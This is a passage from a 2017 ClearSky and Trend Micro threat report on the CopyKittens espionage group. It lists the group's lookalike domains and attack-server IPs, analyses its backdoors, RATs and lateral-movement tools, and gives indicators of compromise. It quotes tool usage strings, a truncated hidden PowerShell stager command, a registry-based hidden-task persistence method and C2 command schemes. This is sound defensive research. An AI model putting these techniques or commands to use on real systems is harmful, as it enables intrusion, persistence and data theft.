Security companies and products – Trend Micro, McAfee, Microsoft Defender, and potentially Cellebrite - Israeli organizations of interest to the victim – News originations, Israeli Prime Minister Office, an Israeli ISP - Other organizations or generic web services - The attackers always use Whoisguard for Whois details protection.[33] - Domains are usually registered in bulk every few months. - Long subdomains are created like those used by Content Delivery Networks. For example: wk-in-f104.1e100.n.microsoft-security[.]host ns1.static.dyn-usr.gsrv01.ssl-gstatic[.]online c20.jdk.cdn-external-ie.1e100.alkamaihd[.]net msnbot-sd7-46-194.microsoft-security[.]host ns2.static.dyn-usr.gsrv02.ssl-gstatic.online static.dyn-usr.g-blcse.d45.a63.alkamaihd[.]net ea-in-f155.1e100.microsoft-security[.]host is-cdn.edge.g18.dyn.usr-e12-as.akamaitechnology[.]com static.dyn-usr.f-login-me.c19.a23.akamaitechnology[.]com pht.is.nlb-deploy.edge-dyn.e11.f20.ads-youtube[.]online ae13-0-hk2-96cbe-1a-ntwk-msn.alkamaihd[.]com be-5-0-ibr01-lts-ntwk-msn.alkamaihd[.]com a17-h16.g11.iad17.as.pht-external.c15.qoldenlines[.]net - Some of the domains have been in use for more than two years. 33 [http://www.whoisguard.com/](http://www.whoisguard.com/) Page 22 of 48 ©All rights reserved to ClearSky cyber security and Trend Micro, 2017 ----- Often the attackers would point malicious domains to IPs not in their control. For example, as can be seen in the screenshot below from PassiveTotal, multiple domains and hosts (marked red) were pointed to a nonmalicious IP owned by Google.[3435] _Multiple domains and hosts pointing to a non-malicious IP owned by Google_ This pattern was instrumental for us in pivoting and detecting further malicious domains. _Multiple domains and hosts pointing to a non-malicious IP owned by Google_ 34 [https://passivetotal.org/search/172.217.20.78](https://passivetotal.org/search/172.217.20.78) 35 [https://passivetotal.org/search/172.217.0.227](https://passivetotal.org/search/172.217.0.227) Page 23 of 48 ©All rights reserved to ClearSky cyber security and Trend Micro, 2017 ----- #### IPs The table below lists IPs used by the attackers, how they were used, and their autonomous system name and number.[36] Notably, most are hosted in the Russian Federation, United States, and Netherlands. **IP** **Use** **Country** **AS name** **ASN** 206.221.181.253 Cobalt Strike United States Choopa LLC AS20473 66.55.152.164 Cobalt Strike United States Choopa LLC AS20473 68.232.180.122 Cobalt Strike United States Choopa LLC AS20473 173.244.173.11 Metasploit and web hacking United States eNET Inc. AS10297 173.244.173.12 Metasploit and web hacking United States eNET Inc. AS10297 173.244.173.13 Metasploit and web hacking United States eNET Inc. AS10297 209.190.20.149 NA United States eNET Inc. AS10297 209.190.20.59 NA United States eNET Inc. AS10297 209.190.20.62 NA United States eNET Inc. AS10297 209.51.199.116 Metasploit and web hacking United States eNET Inc. AS10297 38.130.75.20 NA United States Foxcloud Llp AS200904 185.92.73.194 NA United States Foxcloud Llp AS200904 146.0.73.109 Cobalt Strike Netherlands Hostkey B.v. AS57043 146.0.73.110 NA Netherlands Hostkey B.v. AS57043 146.0.73.111 Metasploit and web hacking Netherlands Hostkey B.v. AS57043 146.0.73.112 Cobalt Strike Netherlands Hostkey B.v. AS57043 146.0.73.114 Cobalt Strike Netherlands Hostkey B.v. AS57043 144.168.45.126 BEEF SSL Server United States Incero LLC AS54540 217.12.201.240 Cobalt Strike Netherlands ITL Company AS21100 217.12.218.242 Cobalt Strike Netherlands ITL Company AS21100 5.34.180.252 Cobalt Strike Netherlands ITL Company AS21100 5.34.181.13 Cobalt Strike Netherlands ITL Company AS21100 188.120.224.198 Cobalt Strike Russian Federation JSC ISPsystem AS29182 188.120.228.172 NA Russian Federation JSC ISPsystem AS29182 188.120.242.93 Cobalt Strike Russian Federation JSC ISPsystem AS29182 188.120.243.11 NA Russian Federation JSC ISPsystem AS29182 188.120.247.151 TDTESS Russian Federation JSC ISPsystem AS29182 62.109.2.52 Cobalt Strike Russian Federation JSC ISPsystem AS29182 188.120.232.157 Cobalt Strike Russian Federation JSC ISPsystem AS29182 185.118.65.230 NA Russian Federation LLC CloudSol AS59504 185.118.66.114 NA Russian Federation LLC CloudSol AS59504 141.105.67.58 Metasploit and web hacking Russian Federation Mir Telematiki Ltd AS49335 141.105.68.25 Cobalt Strike Russian Federation Mir Telematiki Ltd AS49335 141.105.68.26 Metasploit and web hacking Russian Federation Mir Telematiki Ltd AS49335 141.105.68.29 Metasploit and web hacking Russian Federation Mir Telematiki Ltd AS49335 141.105.69.69 Cobalt Strike Russian Federation Mir Telematiki Ltd AS49335 141.105.69.70 matreyoshka Russian Federation Mir Telematiki Ltd AS49335 141.105.69.77 Metasploit and web hacking Russian Federation Mir Telematiki Ltd AS49335 36 Some have been reported in our previous public reports Page 24 of 48 ©All rights reserved to ClearSky cyber security and Trend Micro, 2017 |IP|Use|Country|AS name|ASN| |---|---|---|---|---| |206.221.181.253|Cobalt Strike|United States|Choopa LLC|AS20473| |66.55.152.164|Cobalt Strike|United States|Choopa LLC|AS20473| |68.232.180.122|Cobalt Strike|United States|Choopa LLC|AS20473| |173.244.173.11|Metasploit and web hacking|United States|eNET Inc.|AS10297| |173.244.173.12|Metasploit and web hacking|United States|eNET Inc.|AS10297| |173.244.173.13|Metasploit and web hacking|United States|eNET Inc.|AS10297| |209.190.20.149|NA|United States|eNET Inc.|AS10297| |209.190.20.59|NA|United States|eNET Inc.|AS10297| |209.190.20.62|NA|United States|eNET Inc.|AS10297| |209.51.199.116|Metasploit and web hacking|United States|eNET Inc.|AS10297| |38.130.75.20|NA|United States|Foxcloud Llp|AS200904| |185.92.73.194|NA|United States|Foxcloud Llp|AS200904| |146.0.73.109|Cobalt Strike|Netherlands|Hostkey B.v.|AS57043| |146.0.73.110|NA|Netherlands|Hostkey B.v.|AS57043| |146.0.73.111|Metasploit and web hacking|Netherlands|Hostkey B.v.|AS57043| |146.0.73.112|Cobalt Strike|Netherlands|Hostkey B.v.|AS57043| |146.0.73.114|Cobalt Strike|Netherlands|Hostkey B.v.|AS57043| |144.168.45.126|BEEF SSL Server|United States|Incero LLC|AS54540| |217.12.201.240|Cobalt Strike|Netherlands|ITL Company|AS21100| |217.12.218.242|Cobalt Strike|Netherlands|ITL Company|AS21100| |5.34.180.252|Cobalt Strike|Netherlands|ITL Company|AS21100| |5.34.181.13|Cobalt Strike|Netherlands|ITL Company|AS21100| |188.120.224.198|Cobalt Strike|Russian Federation|JSC ISPsystem|AS29182| |188.120.228.172|NA|Russian Federation|JSC ISPsystem|AS29182| |188.120.242.93|Cobalt Strike|Russian Federation|JSC ISPsystem|AS29182| |188.120.243.11|NA|Russian Federation|JSC ISPsystem|AS29182| |188.120.247.151|TDTESS|Russian Federation|JSC ISPsystem|AS29182| |62.109.2.52|Cobalt Strike|Russian Federation|JSC ISPsystem|AS29182| |188.120.232.157|Cobalt Strike|Russian Federation|JSC ISPsystem|AS29182| |185.118.65.230|NA|Russian Federation|LLC CloudSol|AS59504| |185.118.66.114|NA|Russian Federation|LLC CloudSol|AS59504| |141.105.67.58|Metasploit and web hacking|Russian Federation|Mir Telematiki Ltd|AS49335| |141.105.68.25|Cobalt Strike|Russian Federation|Mir Telematiki Ltd|AS49335| |141.105.68.26|Metasploit and web hacking|Russian Federation|Mir Telematiki Ltd|AS49335| |141.105.68.29|Metasploit and web hacking|Russian Federation|Mir Telematiki Ltd|AS49335| |141.105.69.69|Cobalt Strike|Russian Federation|Mir Telematiki Ltd|AS49335| |141.105.69.70|matreyoshka|Russian Federation|Mir Telematiki Ltd|AS49335| |141.105.69.77|Metasploit and web hacking|Russian Federation|Mir Telematiki Ltd|AS49335| ----- |IP|Use|Country|AS name|ASN| |---|---|---|---|---| |31.192.105.16|Cobalt Strike|Russian Federation|Mir Telematiki Ltd|AS49335| |31.192.105.17|Metasploit and web hacking|Russian Federation|Mir Telematiki Ltd|AS49335| |31.192.105.28|Cobalt Strike|Russian Federation|Mir Telematiki Ltd|AS49335| |158.69.150.163|Cobalt Strike|Canada|OVH SAS|AS16276| |176.31.18.29|Cobalt Strike|France|OVH SAS|AS16276| |188.165.69.39|Cobalt Strike|France|OVH SAS|AS16276| |192.99.242.212|Cobalt Strike|Canada|OVH SAS|AS16276| |198.50.214.62|Cobalt Strike|Canada|OVH SAS|AS16276| |51.254.76.54|Cobalt Strike|France|OVH SAS|AS16276| |198.55.107.164|NA|United States|QuadraNet Inc|AS8100| |104.200.128.126|Cobalt Strike|United States|Total Server Solutions L.L.C.|AS46562| |104.200.128.161|Cobalt Strike|United States|Total Server Solutions L.L.C.|AS46562| |104.200.128.173|Cobalt Strike|United States|Total Server Solutions L.L.C.|AS46562| |104.200.128.183|Cobalt Strike|United States|Total Server Solutions L.L.C.|AS46562| |104.200.128.184|Cobalt Strike|United States|Total Server Solutions L.L.C.|AS46562| |104.200.128.185|Cobalt Strike|United States|Total Server Solutions L.L.C.|AS46562| |104.200.128.187|Cobalt Strike|United States|Total Server Solutions L.L.C.|AS46562| |104.200.128.195|Cobalt Strike|United States|Total Server Solutions L.L.C.|AS46562| |104.200.128.196|Cobalt Strike|United States|Total Server Solutions L.L.C.|AS46562| |104.200.128.198|Cobalt Strike|United States|Total Server Solutions L.L.C.|AS46562| |104.200.128.205|Cobalt Strike|United States|Total Server Solutions L.L.C.|AS46562| |104.200.128.206|Cobalt Strike|United States|Total Server Solutions L.L.C.|AS46562| |104.200.128.208|Cobalt Strike|United States|Total Server Solutions L.L.C.|AS46562| |104.200.128.209|Cobalt Strike|United States|Total Server Solutions L.L.C.|AS46562| |104.200.128.48|Cobalt Strike|United States|Total Server Solutions L.L.C.|AS46562| |104.200.128.58|Cobalt Strike|United States|Total Server Solutions L.L.C.|AS46562| |104.200.128.64|Cobalt Strike|United States|Total Server Solutions L.L.C.|AS46562| |104.200.128.71|Cobalt Strike|United States|Total Server Solutions L.L.C.|AS46562| |107.181.160.138|Cobalt Strike|United States|Total Server Solutions L.L.C.|AS46562| |107.181.160.178|Cobalt Strike|United States|Total Server Solutions L.L.C.|AS46562| |107.181.160.194|Cobalt Strike|United States|Total Server Solutions L.L.C.|AS46562| |107.181.160.195|Cobalt Strike|United States|Total Server Solutions L.L.C.|AS46562| |107.181.161.141|Cobalt Strike|United States|Total Server Solutions L.L.C.|AS46562| |107.181.174.21|Cobalt Strike|United States|Total Server Solutions L.L.C.|AS46562| |107.181.174.228|Cobalt Strike|United States|Total Server Solutions L.L.C.|AS46562| |107.181.174.232|Cobalt Strike|United States|Total Server Solutions L.L.C.|AS46562| |107.181.174.241|Cobalt Strike|United States|Total Server Solutions L.L.C.|AS46562| |86.105.18.5|Cobalt Strike|Netherlands|WorldStream B.V.|AS49981| |93.190.138.137|NA|Netherlands|WorldStream B.V.|AS49981| |212.199.61.51|Cobalt Strike|Israel|012 Smile Communications LTD.|AS9116| |80.179.42.37|NA|Israel|012 Smile Communications LTD.|AS9116| |80.179.42.44|NA|Israel|012 Smile Communications LTD.|AS9116| Page 25 of 48 ©All rights reserved to ClearSky cyber security and Trend Micro, 2017 ----- Recently the attackers implemented self-signed certificates in some of the severs they manage, impersonating Microsoft and Google.[37] _Self-signed digital certificate impersonating Microsoft as captured by censys.io_ 37 [https://censys.io/certificates/f4aaac7d6aafc426d1adbe3b845a26c4110f7c9e54145444a8668718b84cbdb0](https://censys.io/certificates/f4aaac7d6aafc426d1adbe3b845a26c4110f7c9e54145444a8668718b84cbdb0) Page 26 of 48 ©All rights reserved to ClearSky cyber security and Trend Micro, 2017 ----- ### Malware In this chapter we analyze and review malware used by CopyKittens. #### TDTESS Backdoor TDTESS (22fd59c534b9b8f5cd69e967cc51de098627b582) is 64-bit .NET binary backdoor that provides a reverse shell with an option to download and execute files. It routinely calls in to the command and control server for new instructions using basic authentication. Commands are sent via a web page. The malware creates a stealth service, which will not show on the service manager or other tools that enumerate services from WINAPI or Windows Management Instrumentation. ##### Installation and removal TDTESS can run as either an interactive or non-interactive (service) program. When called interactively, it receives one of the two arguments: installtheservice to install itself or uninstalltheservice to remove itself. The arguments are described below: **installtheservice** If running with administrator privileges, it will install a service with the following characteristics: **_Key name: bmwappushservice_** **_Display name: bmwappushsvc_** **_Description: WAP Push Message Routing Service_** **_Type: own (runs in its own process)_** **_Start type: auto (starts each time the computer is restarted and runs even if no one logs on to the_** _computer)_ **_Path:
(In our analysis: c:\Users\PC008\Desktop\t.exe)_** **_Security descriptor:_** _D:(D;;DCLCWPDTSD;;;IU)(D;;DCLCWPDTSD;;;SU)(D;;DCLCWPDTSD;;;BA)(A;;CCLCSWLOCRRC;;;IU)(A;;CCLC_ _SWLOCRRC;;;SU)(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)S:(AU;F_ _A;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)_ _Service information from command-line using sc tool_ The hardcoded security descriptor used to create the service is a persistence technique. Interactive users, even if they are administrators, cannot stop or even see the service in services.msc snap-in. Page 27 of 48 ©All rights reserved to ClearSky cyber security and Trend Micro, 2017 ----- Following is a list of denied commands: _service_change_config_ _service_query_status_ _service_stop_ _service_pause_continue_ _delete_ _Service information in Registry_ Two log files are created during the service installation, but deleted by the program. Following is their recovered content: _InstallUtil.InstallLog_ _.t.InstallLog_ After creating the service, it will update the file creation time to that of the following file: _%windir%\system32\svchost.exe_ Page 28 of 48 ©All rights reserved to ClearSky cyber security and Trend Micro, 2017 ----- **uninstalltheservice** If running with administrator privileges, it will uninstall the said service, create log files and then deletes them. _InstallUtil.InstallLog_ _.t.InstallLog_ Because the service installing mechanism appears to be default for .NET programs, the creator of the tool deletes the log files right after they are created. If no argument is given when called interactively, the program terminates itself. ##### Functionality The service is started immediately after installation. After five minutes, it verifies internet connectivity by making a HTTP HEAD request to microsoft.com. Then it tries to access the C&C servers looking for commands. _Hardcoded HTTP parameters and URL_ Page 29 of 48 ©All rights reserved to ClearSky cyber security and Trend Micro, 2017 ----- As a reply, TDTESS expects one of the following Bas64 encoded commands: **_getnrun - download and execute a file. Parameters are drop, drop_path and t._** **_runnreport - send information about the computer. Parameters are cmd and boss._** **_wait - time to next interval to get data._** _Getnrun command and parameters_ ##### Indicators of Compromise File name: _tdtess.exe_ md5: 113ca319e85778b62145019359380a08 Services: _bmwappushservice_ Registry Keys: _HKLM\System\CurrentControlSet\Services\bmwappushservice_ URLs: _http://is-cdn.edge.g18.dyn.usr-e12-as.akamaitechnology[.]com/deploy/assets/css/main/style.min.css_ _http://a17-h16.g11.iad17.as.pht-external.c15.qoldenlines[.]net/deploy/assets/css/main/style.min.css_ HTTP artifacts: _"User-Agent : XXXXXXXXXXXXXXXXX/5.0 (Windows NT 6.1 WOW64; Trident/7.0; AS; rv:11.0) like Gecko"_ _"Proxy-Authorization : Basic [Data]" – [Data]_ Will contain the TDTESS encrypted data to send Page 30 of 48 ©All rights reserved to ClearSky cyber security and Trend Micro, 2017 ----- #### Vminst for Lateral Movement Vminst (a60a32f21ac1a2ec33135a650aa8dc71) is a lateral movement tool used to infect hosts in the network using previously stolen credentials. It Injects Cobalt Strike into memory of infected hosts. The binary implements ServiceMain and is intended to be installed as a service named “sdrsrv.” When it functions as a service, it injects Cobalt Strike beacon into its own process (which is 32-bit “svchost”) or creates a new 32-bit “rundll32” process and injects the beacon into the new process. The injection method depends on the parameter received when the service was created. It is configured to open a new “rundll32” process in suspend-mode and create a remote thread which executes a Cobalt Strike beacon or shellcode. The binary has the option to run and load itself in memory. It also has the option to be executed through its exported function "v," which gets a base64 string parameter built as follows: _Base-64-Encode(“/mv /OptionalCommand”)_ _OptionalCommand can be one of the following:_ - **help - prints usage instructions:** _[*] /help V160\n_ _Get : Create Service and run beacon over self thread\n_ _[*] /get ip (use current token)\n_ _[*] /get ip domain user pass\n_ _[*] /get ip user pass\n_ _New : Create Service and run beacon over new rundll32.exe thread\n_ _[*] /new ip (use current token)\n_ _[*] /new ip domain user pass\n_ _[*] /new ip user pass\n_ _[*] /new ip user pass\n_ _Del : Delete service and related dlls from remote host_ _[*] /del ip domain user pass\n_ _[*] /del ip user pass\n_ _[*] /del ip\n_ _Run : Run a new beacon !\n_ _[*] /run [no arguments]_ - **del - stops and deletes the service “sdrsrv,” and deletes the following files:** _\\ [IP or computer name (Can be Localhost)]\C$\Users\public\vminst.tmp_ _\\ [IP or computer name (Can be Localhost)]\C$\Windows\Temp\vminst.tmp_ _\\ [IP or computer name (Can be Localhost)]\C$\Windows\vminst.tmp_ - **scan - sends “]ok[” to the parent of its parent process.** - **info - sends “]ok[” to the parent of its parent process.** - **run - injects a beacon into a new “rundll32” process.** - **get - gets an IP address, installs and starts the “sdrsrv” service in the remote hosts.** - **new - gets IP address, deletes the old vminst from install path, and installs the “sdrsrv” service in the** remote hosts. Then, starts the service with parameter “NEW_THREAD” that runs the service. This command is likely used for updating the implant. The attacker uses vminst.tmp to spread across the organization. Using the command “rundll32 vminst.tmp,v _/mv /get ip-segment credentials” it enumerates the segments and tries to connect to the hosts through SMB_ (“GetFileAttributes” to network path), installing the “sdrsrv” service in each host it can access. Page 31 of 48 ©All rights reserved to ClearSky cyber security and Trend Micro, 2017 ----- **Indicators of Compromise** File name: _vminst.tmp_ md5: _A60A32F21AC1A2EC33135A650AA8DC71_ Services: sdrsrv Registry Keys: HKLM\System\CurrentControlSet\Services\sdrsrv Path: _\\ [IP or computer name (Can be Localhost)]\C$\Users\public\[File]_ _\\ [IP or computer name (Can be Localhost)]\C$\Windows\Temp\[File]_ _\\ [IP or computer name (Can be Localhost)]\C$\Windows\[File]_ File, one of: _vminst.tmp - The malware_ _l.tmp - Log file from last V command_ #### NetSrv – Cobalt Strike Loader NetSrv (efca6664ad6d29d2df5aaecf99024892) loads Cobalt Strike beacons and shellcodes in infected computers. The binary implements ServiceMain, intended to be installed as a service named “netsrv.” When it functions as a service, it is configured to open a new “rundll32” process in suspend-mode and create a remote thread that executes a Cobalt Strike beacon or shellcode. The binary also has the option to be executed with parameters that determine what it will inject into the “rundll32” process. The command-line is as follows: _netsrv.exe /managed /ModuleToInject_ The ModuleToInject can be one of these options: _sbdns_ _slbdnsk1_ _slbdnsn1_ _slbsbmn1_ _slbsmbk1_ Each of these options injects a Cobalt Strike beacon or shellcode into the “rundll32” process. **Indicators of Compromise** File names: _netsrv.exe_ _netsrva.exe_ _netsrvd.exe_ _netsrvs.exe_ Services: _netsrv_ _netsrvs_ _netsrvd_ Registry Keys: _HKLM\System\CurrentControlSet\Services\netsrv_ _HKLM\System\CurrentControlSet\Services\netsrvs_ Page 32 of 48 ©All rights reserved to ClearSky cyber security and Trend Micro, 2017 ----- _HKLM\System\CurrentControlSet\Services\netsrvd_ #### Matryoshka v1 – RAT Matryoshka v1 is a RAT analyzed in the 2015 report by ClearSky and Minerva.[38] It uses DNS for command and control communication, and has common RAT capabilities such as stealing Outlook passwords, screen grabbing, keylogging, collecting and uploading files, and giving the attacker Meterpreter shell access. We have seen this version of Matreyoshka in the wild from July 2016 until January 2017. The Matryoshka.Reflective_Loader injects the module Matryoshka.Rat, which has the same persistence keys and communication method described in the original report. **Indicators of Compromise** **File name** **Md5** **Command and control** Kernel.dll 94ba33696cd6ffd6335948a752ec9c19 cloudflare-statics[.]com win.dll d9aa197ca2f01a66df248c7a8b582c40 cloudflare-analyse[.]com update5x.dll 506415ef517b4b1f7679b3664ad399e1 mswordupdate17[.]com 22092014_ver621.dll 1ca03f92f71d5ecb5dbf71b14d48495c Registry Keys: _HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run\{0355F5D0-467C-30E9-894C-_ _C2FAEF522A13}_ HKCU\Software\Microsoft\Windows\CurrentVersion\Run\{0355F5D0-467C-30E9-894C-C2FAEF522A13} Scheduled Tasks: _\Windows\Microsoft Boost Kernel Optimization_ _Windows Boost Kernel_ #### Matreyoshka v2 – RAT Matryoshka v2 (bd38cab32b3b8b64e5d5d3df36f7c55a) is mostly like Matreyoshka v1 but has fewer commands and a few other minor changes. Upon starting it will inject the communication module to all available processes (with the same run architecture and the same or lower level of permission). The inner name of Svchost’s is Injector.dll. The next stage, in memory, is ReflectiveDLL.dll. The ReflectiveDLL.dll provides persistence via a schedule task and checks that the stager, Injector.dll, exist on disk. ReflectiveDLL.dll gets commands via the following DNS resolutions: **Command** **Resolved IP** **Functionality** Send full info 104.40.211.100 Send host information Beacon 104.40.211.11 Inject Cobalt Strike beacon MessageBox 104.40.211.12 Pop MessageBox with simple note (Only if injected into process with user interface) Get UID 104.40.211.13 Send UID Exit 104.40.211.14 Exit the process the thread was injected into OK_StopParse 161.69.29.251 keep-alive or end chain of commands 38 [www.clearskysec.com/report-the-copykittens-are-targeting-israelis/](http://www.clearskysec.com/report-the-copykittens-are-targeting-israelis/) Page 33 of 48 ©All rights reserved to ClearSky cyber security and Trend Micro, 2017 |Indicators of Compromise|Col2|Col3| |---|---|---| |File name|Md5|Command and control| |Kernel.dll|94ba33696cd6ffd6335948a752ec9c19|cloudflare-statics[.]com| |win.dll|d9aa197ca2f01a66df248c7a8b582c40|cloudflare-analyse[.]com| |update5x.dll 22092014_ver621.dll|506415ef517b4b1f7679b3664ad399e1 1ca03f92f71d5ecb5dbf71b14d48495c|mswordupdate17[.]com| |Command|Resolved IP|Functionality| |---|---|---| |Send full info|104.40.211.100|Send host information| |Beacon|104.40.211.11|Inject Cobalt Strike beacon| |MessageBox|104.40.211.12|Pop MessageBox with simple note (Only if injected into process with user interface)| |Get UID|104.40.211.13|Send UID| |Exit|104.40.211.14|Exit the process the thread was injected into| |OK_StopParse|161.69.29.251|keep-alive or end chain of commands| ----- **Indicators of Compromise** File names: _Svchost32.swp_ _Svchost64.swp_ Md5: _bd38cab32b3b8b64e5d5d3df36f7c55a_ Folder path: _[windrive]\Users\public\_ _[windrive]\Windows\temp\_ _[windrive]\Windows\tmp\_ Files: _LogManager.tmp_ _edg1CF5.tmp (malware backup copy)_ _ntuser.swp (malware backup copy)_ _svchost64.swp (malware main file)_ _ntuser.dat.swp (log file)_ _455aa96e-804g-4bcf-bcf8-f400b3a9cfe9.PackageExtraction (folder)_ __%d.klg (keylog file, random integer)_ __%d.sc (screen capture file, random integer)_ Command and control: winupdate64[.]com Services: _sdrsrv_ Class from CPP RTTI: _PSCL_CLASS_JOB_SAVE_CONFIG_ _PSCL_CLASS_BASE_JOB_ Page 34 of 48 ©All rights reserved to ClearSky cyber security and Trend Micro, 2017 ----- #### ZPP – File Compressor ZPP (bcae706c00e07936fc41ac47d671fc40) is a .NET console program that compresses files with the ZIP algorithm. It can transfer compressed files to a remote network share. Command line options are as follows: **_-I - File extension to compress (i.e.: .txt)_** **_-s - Source directory_** **_-d - Destination directory_** **_-gt - Greater than creation timestamp_** **_-lt - Lower than creation timestamp_** **_-mb - Unimplemented_** **_-o - Output file name_** **_-e - File extension to skip (except)_** _ZPP_ ZPP will recursively read all files in the source directory to compress them with the maximum compression rate if their names match the extension pattern given (-i). The compressed ZIP file is written to the output directory (-d). If no output file name is set, ZPP will use the mask zpp.out. . For example: _Filename is zpp5077.out0_ The file compilation timestamp is Tue, 05 Jul 2016 17:22:59 UTC. ad09feb76709b825569d9c263dfdaaac is a previous version (compilation timestamp: Sat, 09 Jan 2016 17:02:38 UTC) and is only different in that it accepts the –e switch, which ignored by the program logic. 214be584ff88fb9c44676c1d3afd7c95 is the newest version (compilation timestamp: Mon, 26 Sep 2016 19:49:34 UTC). It is supposed to implement the –s switch but although it is set when the user gives it to the program, the switch is ignored by the code. _ZPP version 2.0_ ZPP seems to be under development. All versions have bugs. It uses the reduced version of DotNetZip library. [39] Therefore, it requires _Ionic.Zip.Reduced.dll_ (7c359500407dd393a276010ab778d5af) to be under the same directory or %PATH%. Function doCompressInNetWorkDirectory() is intended to exfiltrate date from a target machine to a network share. 39 [https://dotnetzip.codeplex.com](https://dotnetzip.codeplex.com/) Page 35 of 48 ©All rights reserved to ClearSky cyber security and Trend Micro, 2017 ----- _ZPP doCompressInNetWorkDirectory() function_ Passing it a network location will result in the compressed files being dropped in it: _Passing a network location to ZPP_ **Indicators of Compromise** File name: _zpp.exe_ md5: _bcae706c00e07936fc41ac47d671fc40_ _ad09feb76709b825569d9c263dfdaaac_ _214be584ff88fb9c44676c1d3afd7c95_ #### Cobalt Strike Cobalt Strike is a publicly available commercial software for "Adversary Simulations and Red Team Operations."[40] While not malicious in and of itself, it is often used by cybercrime groups and state-sponsored threat groups, due to its post-exploitation and covert communication capabilities.[ 41] [4243] [44] CopyKittens use the free 21-day trial version of Cobalt Strike. Thus, malicious communication generated by the tool is much easier to detect, because a special header is sent in each HTTP GET transaction. The special header is "X-Malware," i.e. there is a literal indication that "this network communication is malicious." All that 40 [https://www.cobaltstrike.com](https://www.cobaltstrike.com/) 41 [https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html](https://www.fireeye.com/blog/threat-research/2017/05/cyber-espionage-apt32.html) 42 [https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks](https://www.symantec.com/connect/blogs/odinaff-new-trojan-used-high-level-financial-attacks) 43 [https://www.cybereason.com/labs-operation-cobalt-kitty-a-large-scale-apt-in-asia-carried-out-by-the-](https://www.cybereason.com/labs-operation-cobalt-kitty-a-large-scale-apt-in-asia-carried-out-by-the-oceanlotus-group/) [oceanlotus-group/](https://www.cybereason.com/labs-operation-cobalt-kitty-a-large-scale-apt-in-asia-carried-out-by-the-oceanlotus-group/) 44 [http://www.antiy.net/wp-content/uploads/ANALYSIS-ON-APT-TO-BE-ATTACK-THAT-FOCUSING-ON-](http://www.antiy.net/wp-content/uploads/ANALYSIS-ON-APT-TO-BE-ATTACK-THAT-FOCUSING-ON-CHINAS-GOVERNMENT-AGENCY-.pdf) [CHINAS-GOVERNMENT-AGENCY-.pdf](http://www.antiy.net/wp-content/uploads/ANALYSIS-ON-APT-TO-BE-ATTACK-THAT-FOCUSING-ON-CHINAS-GOVERNMENT-AGENCY-.pdf) Page 36 of 48 ©All rights reserved to ClearSky cyber security and Trend Micro, 2017 ----- defender need to do to detect infections is to look for this header in network traffic. Other tells are implemented in the trail version.[45] CopyKittens often use Cobalt Strike's DNS based command and control capability.[46] Other capabilities include PowerShell scripts execution, keystrokes logging, taking screenshots, file downloads, spawning other payloads, and peer-to-peer communication over the SMB. ##### Persistency The attackers used a novel way for persistency of Cobalt Strike samples in certain machine – a scheduled task was written directly to the registry. The malware creates a PowerShell wrapper, which executes powershell.exe to run scripts. The wrapper is copied to %windir% with one of the following names: _svchost.exe_ _csrss.exe_ _notpad.exe (note missing e)_ _conhost.exe_ The scheduled tasks are saved in the following registry path: _HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks_ With the following attributes: _"Path"="\\Microsoft\\Windows\\Media Center\\ConfigureLocalTimeService"_ _"Description"="Media Center Time Update From Computer Local Time."_ _"Actions"=hex:01,00,66,66,00,00,00,00,2c,00,00,00,43,00,3a,00,5c,00,57,00,69,\_ _00,6e,00,64,00,6f,00,77,00,73,00,5c,00,73,00,76,00,63,00,68,00,6f,00,73,00,\_ _74,00,2e,00,65,00,78,00,65,00,7e,31,00,00,2d,00,6e,00,6f,00,70,00,20,00,2d,\_ _00,77,00,20,00,68,00,69,00,64,00,64,00,65,00,6e,00,20,00,2d,00,65,00,6e,00,\_ _63,00,6f,00,64,00,65,00,64,00,63,00,6f,00,6d,00,6d,00,61,00,6e,00,64,00,20,\_ _00,4a,00,41,00,42,00,7a,00,41,00,44,00,30,00,41,00,54,00,67,00,42,00,6c,00,\_ _[…]_ The hex code in the Actions attribute is converted into the following command line action: _C:\Windows\svchost.exe -nop -w hidden -encodedcommand JABzAD0ATgBl[…]_ The executed command is a base64 encoded PowerShell cobalt strike stager. The task does not have a name attribute and it does not appear in windows scheduled task viewers. The installation methods of this persistency method is unknown to us. #### Metasploit A well-known free and open source framework for developing and executing exploit code against a remote target machine.[47] It has more than 1,610 exploits, as well as more than 438 payloads, which include command shell that enables users to run collection scripts or arbitrary commands against the host. Meterpreter, which enables users to control the screen of a device using VNC and to browse, upload and download files. It also employs dynamic payloads that enables users to evade antivirus defenses by generating unique payloads.[48] 45 [https://blog.cobaltstrike.com/2015/10/14/the-cobalt-strike-trials-evil-bit/](https://blog.cobaltstrike.com/2015/10/14/the-cobalt-strike-trials-evil-bit/) 46 [https://www.cobaltstrike.com/help-dns-beacon](https://www.cobaltstrike.com/help-dns-beacon) 47 [https://www.metasploit.com](https://www.metasploit.com/) 48 [https://en.wikipedia.org/wiki/Metasploit_Project](https://en.wikipedia.org/wiki/Metasploit_Project) Page 37 of 48 ©All rights reserved to ClearSky cyber security and Trend Micro, 2017 ----- #### Empire Post-exploitation Framework In several occasions the attackers used Empire, a free and open source "post-exploitation framework that includes a pure-PowerShell2.0 Windows agent, and a pure Python 2.6/2.7 Linux/OS X agent.[49] The framework offers cryptologically-secure communications and a flexible architecture. On the PowerShell side, Empire implements the ability to run PowerShell agents without needing powershell.exe, rapidly deployable postexploitation modules ranging from key loggers to Mimikatz, and adaptable communications to evade network detection, all wrapped up in a usability-focused framework." 49 [https://github.com/EmpireProject/Empire](https://github.com/EmpireProject/Empire) Page 38 of 48 ©All rights reserved to ClearSky cyber security and Trend Micro, 2017 ----- ### Indicators of Compromise Detection name BKDR_COBEACON.A Detection name TROJ_POWPICK.A Detection name HKTL_PASSDUMP Detection name TROJ_SODREVR.A Detection name TROJ_POWSHELL.C Detection name BKDR_CONBEA.A Detection name TSPY64_REKOTIB.A Detection name HKTL_DIRZIP Detection name TROJ_WAPPOME.A URL [http://js[.]jguery[.]net/main[.]js](http://js[.]jguery[.]net/main%5b.%5djs) URL http://pht[.]is[.]nlb-deploy[.]edge-dyn[.]e11[.]f20[.]ads-youtube[.]online/winini[.]exe URL http://38[.]130[.]75[.]20/check[.]html URL 